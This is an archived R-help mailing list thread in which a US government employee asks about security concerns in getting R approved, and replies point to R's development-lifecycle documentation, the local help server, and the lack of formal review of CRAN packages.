R help - Dec 2009 - What might be the security issues from installing R?

I work in a US government office, where regular computer users are not allowed
Admin access to their computers, and all software must go through an extensive
evaluation to be approved for installation and use.  Several of us in my office
would greatly benefit from R, so I'd like to request that it go through the
approval process.  Does anyone out there have any experience or advice to share?

My guess is that we may run into problems due to R being open-source, leading to
a potential perception that the code might be poorly controlled. This could be
further complicated by the need for downloading additional open-source packages.
At present, I am not aware of any open source software that has passed through
the approval process, though I am also not aware of any policy against
open-source.

Thanks!
---
Eric Peterson, Ph.D.
Data Steward
Trinity River Restoration Program
(contracted through SAIC)
530-623-1810
http://www.trrp.net
http://www.saic.com


	[[alternative HTML version deleted]]

On Dec 28, 2009, at 12:23 PM, Peterson, Eric B. wrote:
> I work in a US government office, where regular computer users are  
> not allowed Admin access to their computers, and all software must  
> go through an extensive evaluation to be approved for installation  
> and use.  Several of us in my office would greatly benefit from R,  
> so I'd like to request that it go through the approval process.   
> Does anyone out there have any experience or advice to share?
>
> My guess is that we may run into problems due to R being open- 
> source, leading to a potential perception that the code might be  
> poorly controlled. This could be further complicated by the need for  
> downloading additional open-source packages.  At present, I am not  
> aware of any open source software that has passed through the  
> approval process, though I am also not aware of any policy against  
> open-source.
>
> Thanks!

Eric,

You might want to review the following document, which discusses R's  
SDLC, albeit in the context of FDA regulated clinical trials:

   http://www.r-project.org/doc/R-FDA.pdf

Note that the above document covers R as distributed by The R  
Foundation, so does not cover user contributed packages available via  
CRAN or other means.

If you were to search the R list archives, you will see that there are  
other U.S. ".gov" e-mail address from various organizations that use  
R, including NOAA, NPS, NIH, EPA, DOC and FRB. There are also many  
governmental bodies outside the U.S. that use R.

Another issue to be aware of is that since version 2.10.0, R uses  
dynamically built HTML pages for help. This requires the use of an R  
installed local web server, which might conflict with local policies.  
More information is available in the FAQs:

   http://cran.r-project.org/doc/manuals/R-admin.html#Help-options

If you are running Windows, you might be interested in the following:

  
http://cran.r-project.org/bin/windows/base/rw-FAQ.html#Does-R-run-under-Windows-Vista_003f

and perhaps:

  
http://cran.r-project.org/bin/windows/base/rw-FAQ.html#The-Internet-download-functions-fail_002e

 From a more generic perspective, if your institution is using Linux,  
Apache, OpenOffice, Firefox or Thunderbird among others, they are  
already using open source software.

The barrier to using open source gets lower all the time.

HTH,

Marc Schwartz

On Mon, Dec 28, 2009 at 6:23 PM, Peterson, Eric B. <ebpeterson at
usbr.gov> wrote:
> My guess is that we may run into problems due to R being open-source,
leading to a potential perception that the code might be poorly controlled. This
could be further complicated by the need for downloading additional open-source
packages. ?At present, I am not aware of any open source software that has
passed through the approval process, though I am also not aware of any policy
against open-source.
 The 'Core' of R is code committed (and therefore 'controlled')
by a
smallish group of  people:

http://www.r-project.org/contributors.html

 The real problem would come when you start adding additional packages
from CRAN or R-forge or some other source. These are written by
hundreds or possibly thousands of people.

 I've not heard of any malicious code ever being found in an R
package, but maybe one day I'll sneak a back-door server into one of
mine and see how long before it gets spotted. I don't think any formal
review of CRAN package code is ever done (someone may prove me wrong
here, but there's zillions of lines of code in CRAN now).

Barry